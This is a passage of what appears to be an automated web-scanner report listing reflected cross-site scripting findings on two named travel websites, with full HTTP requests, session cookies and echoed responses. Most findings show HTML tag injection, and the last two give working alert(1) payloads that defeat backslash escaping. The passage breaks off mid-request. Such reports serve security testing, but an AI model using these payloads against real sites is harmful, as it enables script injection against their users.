4.397. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 21c9a<a>d19b30c4205 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif21c9a<a>d19b30c4205 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:00:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621621; expires=Tue, 02-Oct-2012 01:00:21 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fproducts_services%2F%22%3Bi%3A3%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:00:22 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13602


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>d19b30c4205">loadingAnimation.gif21c9a<a>d19b30c4205</a>
...[SNIP]...
4.398. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e81ca"><a>0814390df40 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gife81ca"><a>0814390df40 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:00:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621614; expires=Tue, 02-Oct-2012 01:00:14 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:00:14 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13606


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gife81ca"><a>0814390df40">
...[SNIP]...
4.399. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e274c<a>0900278d132 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif?e274c<a>0900278d132=1 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:59:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621565; expires=Tue, 02-Oct-2012 00:59:25 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:59:25 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13608


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>0900278d132=1">loadingAnimation.gif?e274c<a>0900278d132=1</a>
...[SNIP]...
4.400. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e26f8"><a>02159b53e67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif?e26f8"><a>02159b53e67=1 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/show_results?cx=000492012218074769583%3Az9egyc6spxy&cof=FORID%3A10&ie=UTF-8&q=xss+txt+css+img+help+faq&sa=Search
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621516; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.5.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:59:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621556; expires=Tue, 02-Oct-2012 00:59:16 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:59:16 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13612


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif?e26f8"><a>02159b53e67=1">
...[SNIP]...
4.401. http://www.sabretravelnetwork.com/images/home-text.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /images/home-text.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a570b"><a>4bb9c1a04b2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images/home-text.pnga570b"><a>4bb9c1a04b2 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; __utma=248705925.958069665.1317600417.1317600417.1317600417.1; __utmb=248705925.2.10.1317600417; __utmc=248705925; __utmz=248705925.1317600417.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618471; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618539; expires=Tue, 02-Oct-2012 00:08:59 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:08:59 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13104


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home-text.pnga570b"><a>4bb9c1a04b2">
...[SNIP]...
4.402. http://www.sabretravelnetwork.com/images/home-text.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /images/home-text.png

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 77011<a>b692ba6deff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images/home-text.png77011<a>b692ba6deff HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; __utma=248705925.958069665.1317600417.1317600417.1317600417.1; __utmb=248705925.2.10.1317600417; __utmc=248705925; __utmz=248705925.1317600417.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618471; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618544; expires=Tue, 02-Oct-2012 00:09:04 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:09:04 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13100


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>b692ba6deff">home-text.png77011<a>b692ba6deff</a>
...[SNIP]...
4.403. http://www.sabretravelnetwork.com/images/home-text.png [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /images/home-text.png

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fc323<a>0d0d4ee86d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images/home-text.png?fc323<a>0d0d4ee86d0=1 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; __utma=248705925.958069665.1317600417.1317600417.1317600417.1; __utmb=248705925.2.10.1317600417; __utmc=248705925; __utmz=248705925.1317600417.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618471; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618526; expires=Tue, 02-Oct-2012 00:08:46 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:08:46 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13106


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>0d0d4ee86d0=1">home-text.png?fc323<a>0d0d4ee86d0=1</a>
...[SNIP]...
4.404. http://www.sabretravelnetwork.com/images/home-text.png [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /images/home-text.png

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a52a3"><a>eb7230ea2d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images/home-text.png?a52a3"><a>eb7230ea2d8=1 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; __utma=248705925.958069665.1317600417.1317600417.1317600417.1; __utmb=248705925.2.10.1317600417; __utmc=248705925; __utmz=248705925.1317600417.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618471; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317618518; expires=Tue, 02-Oct-2012 00:08:38 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:08:39 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13110


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home-text.png?a52a3"><a>eb7230ea2d8=1">
...[SNIP]...
4.405. http://www.travel-ticker.com/Destination/ [bid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travel-ticker.com
Path:   /Destination/

Issue detail

The value of the bid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b668\"%3balert(1)//94fd85ec758 was submitted in the bid parameter. This input was echoed as 7b668\\";alert(1)//94fd85ec758 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /Destination/?tts=01&sid=S250&bid=B3114977b668\"%3balert(1)//94fd85ec758 HTTP/1.1
Host: www.travel-ticker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ECED9449D2CCA83DC56E12B303E6219B; SaneID=ECED9449D2CCA83DC56E12B303E6219; NSC_xxx.usbwfm-ujdlfs-iuuq=ffffffffaf131c8d45525d5f4f58455e445a4a422d69

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Mon, 03 Oct 2011 00:38:14 GMT
Content-Length: 316092

<!DOCTYPE html>


<html>
<head>


<title>Travel Ticker page not found</title>

<link rel="shortcut icon" href="http://ak-static.travel-ticker.com/static/images/favico
...[SNIP]...
<script>AnalyticsSupport.addAnalyticsContextListVariable("campaign","bid:B3114977b668\\";alert(1)//94fd85ec758");
AnalyticsSupport.addAnalyticsContextListVariable("campaign","sid:S250");

</script>
...[SNIP]...
4.406. http://www.travel-ticker.com/Destination/ [sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travel-ticker.com
Path:   /Destination/

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a90a4\"%3balert(1)//3d9d3aaa825 was submitted in the sid parameter. This input was echoed as a90a4\\";alert(1)//3d9d3aaa825 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /Destination/?tts=01&sid=S250a90a4\"%3balert(1)//3d9d3aaa825&bid=B311497 HTTP/1.1
Host: www.travel-ticker.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
